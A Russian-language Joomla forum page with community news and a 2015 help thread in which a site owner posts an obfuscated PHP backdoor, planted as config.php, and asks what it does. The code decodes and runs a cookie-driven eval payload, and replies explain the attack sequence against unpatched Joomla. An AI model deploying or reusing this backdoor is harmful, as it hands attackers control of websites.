Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 1565 Просмотров
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Кто то залил в корень сайта файл
« : 17.12.2015, 16:29:40 »
Кто то залил в корень сайта файл config.php  с таким содержанием, что это такое?) Что делает этот код? Антивирус его не определяет как вирус, на сайте все чисто.



\<?php $ej = str_replace("eo","","eoseoteoreo_reoeeopeoleoaeoceoe"); $dd="JGapM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkapYSk9PSdmcycapgJiYgapJGMoJGEappPapjMpe"; $yt="lZ1ap9yZXBsYWNlapKGFycmF5apKapCcvW15cdzap1cc10vJywnL1xapzLycappLCBhcnJheapSgnJywnKycpLapCBqapbap2a"; $se="pluKGFycmF5X3NsaWNaplKapCapRhLCRjKCRhKapS0zapKSkpKapSk7ZWNobyAnapPC8nLapiRrLic+apJzt9"; $uiz="yRrapPSc1Zap2ap16MzapMnO2apVjaG8gJzwnLiapRrLic+JztldmFsapKGapJhc2U2NF9kZWNapvZGUocHJ"; $axb = $ej("z", "", "zbzase6z4z_zdzezczozdze"); $oj = $ej("d","","cdrdeadted_dfdundcdtiodn"); $nfh = $oj("", $axb($ej("ap", "", $dd.$uiz.$yt.$se))); $nfh(); ?>
Записан
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Кто то залил в корень сайта файл
« Ответ #1 : 17.12.2015, 16:31:47 »
[patch]
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #2 : 17.12.2015, 17:10:13 »
Это бегдор, который позволяет вертеть вашим сайтом как хочется, антивирус и не спалит, код генерированый, тут нужны специализированные программы
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Кто то залил в корень сайта файл
« Ответ #3 : 17.12.2015, 17:28:29 »
Советую поискать еще такой же файл config.php , в файлах сайта
Вряд ли один файл
Записан
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Кто то залил в корень сайта файл
« Ответ #4 : 17.12.2015, 17:48:00 »
А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
« Последнее редактирование: 17.12.2015, 17:55:55 от sabnok »
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #5 : 17.12.2015, 18:08:27 »
Цитата: sabnok от 17.12.2015, 17:48:00
А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))
Записан
*

sabnok

  • Захожу иногда
  • 126
  • 1 / 0
Re: Кто то залил в корень сайта файл
« Ответ #6 : 17.12.2015, 18:47:52 »
Цитата: winstrool от 17.12.2015, 18:08:27
ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))

Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Кто то залил в корень сайта файл
« Ответ #7 : 17.12.2015, 19:00:11 »
Цитата: sabnok от 17.12.2015, 18:47:52
Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
Кидайте домен в ПМ покажу, этот тип атаки так и реализуется, первый запрос к любой странице, для приобритении сессии, второй для заливки шелла, третий для его чека что он залился
Записан
*

mistbow

  • Захожу иногда
  • 70
  • 4 / 0
Re: Кто то залил в корень сайта файл
« Ответ #8 : 26.12.2015, 03:33:43 »
Тоже сегодня прилетело на десятке сайтов (((
Ладно бы только в корне, о всем папочкам и подпапочкам до самых низов напихали... хрен вычистишь проще вообще тупо все переустановить!
Надеюсь хоть бузы-то не попортили чем-нить эдаким (((
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Кто то залил в корень сайта файл
« Ответ #9 : 26.12.2015, 08:27:28 »
Могли. Могли даже дампы посливать, если сайты интересные.
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3895 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

 Ответов: 678
Просмотров: 271359 		Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 3190 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

 Ответов: 11
Просмотров: 2810 		Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

 Ответов: 18
Просмотров: 5294 		Последний ответ 28.08.2020, 22:00:30
от cntrl